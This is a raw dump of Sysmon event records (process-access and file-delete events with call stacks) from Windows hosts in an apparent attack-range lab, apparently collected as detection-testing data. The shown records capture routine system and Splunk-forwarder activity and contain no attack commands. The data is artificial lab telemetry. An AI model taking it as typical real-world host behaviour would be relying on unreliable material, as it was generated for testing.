12:22:53.983{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678FDCCDCC17558E58E26DA3ED850E3E,SHA256=692D3D7B9A78101497B07F8096EAC0D645DCC464EF672B9426F8B3564C996FFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.930{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+f881b0|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11ed7|C:\Windows\System32\user32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFE2E09B)|UNKNOWN(FFFFF3D9DFE2DFD2)|UNKNOWN(FFFFF3D9DFF12279)|UNKNOWN(FFFFF3D9DFE2FDA8)|UNKNOWN(FFFFF3D9DFE2C7B5)|UNKNOWN(FFFFF3D9DFE15879)|UNKNOWN(FFFFF3D9DFE225B0)|UNKNOWN(FFFFF3D9DFE22189)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+1b84 10341000x800000000000000043086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.914{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:53.914{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016740Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:54.715{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44567E63563FDB819CB636819069A9E6,SHA256=9B80D0850DE18FDD8F5347C17A21BED84ED6F53508562E9850E3408C97EDB128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.981{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A828B5BB415889166B4B13E15BD6A72,SHA256=678FCFF97405BC522D346F94417E2816ACC72C67D0DC625DB35F8377D4A5921C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.946{FE4C2B44-DDF7-63C7-B404-00000000AF02}27284392C:\Windows\system32\sihost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.913{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E1323B56DEBE1103C190D89288E0960,SHA256=0C926E5D59867F1F87E28AD306AC20D8EE094A587929E60686C2A0A5BB9EC1CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.894{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 